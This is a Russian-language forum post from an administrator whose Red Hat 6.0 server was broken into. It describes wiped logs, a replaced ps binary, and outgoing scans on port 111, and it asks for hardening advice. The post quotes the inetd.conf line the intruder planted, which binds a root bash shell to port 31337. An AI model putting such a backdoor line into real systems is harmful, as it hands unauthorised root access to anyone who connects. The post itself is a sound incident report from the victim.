Админы, как правильно настроить защиту сервера?
Ночью меня вскрыли. messages чист, сообщения перенаправлены в null, в inetd.conf открыли доступ через telnet:
31337 stream tcp nowait root /bin/bash bash -i
telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd
хотя до этого он был закрыт, ftp тоже закрыт.
Утром сервер занимался прощупыванием или вскрытием других машин в сети на 111 порту.
ps работает не правильно, видать заменен.
Bind обновлялся. Чем-то похоже на Lion - тоже сканирует другие машины в сети, но явно не он - его следов нет.
Система Red Hat Linux 6.0
У кого подобное было или кто знает, что делать?
Сейчас подправил inetd.conf, сменил пароли, в rc.sysinit закоментировал перенаправление сообщений в null.
До этого кто-то активно пытался пролезть через ftp.
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.
Похожие темы
- Форум inet сервисы: ftp и telnet (2000)
- Форум Тому, кто спрашивал про wrapper (2000)
- Форум ЛОМАНУЛИ!!!!!!!!!!!!!!!!! (2001)
- Форум exim ломанули (2010)
- Форум ломанули ...мля (2004)
- Форум Winall ломанули! (2004)
- Форум tcl.tk ломанули штоле? (2015)
- Форум ломанули мой sendmail ? (2002)
- Форум ЛОМАНУЛИ СЕРВЕР! HELP!! (2005)
- Форум Ломанули HDCP мастер-ключ! (2010)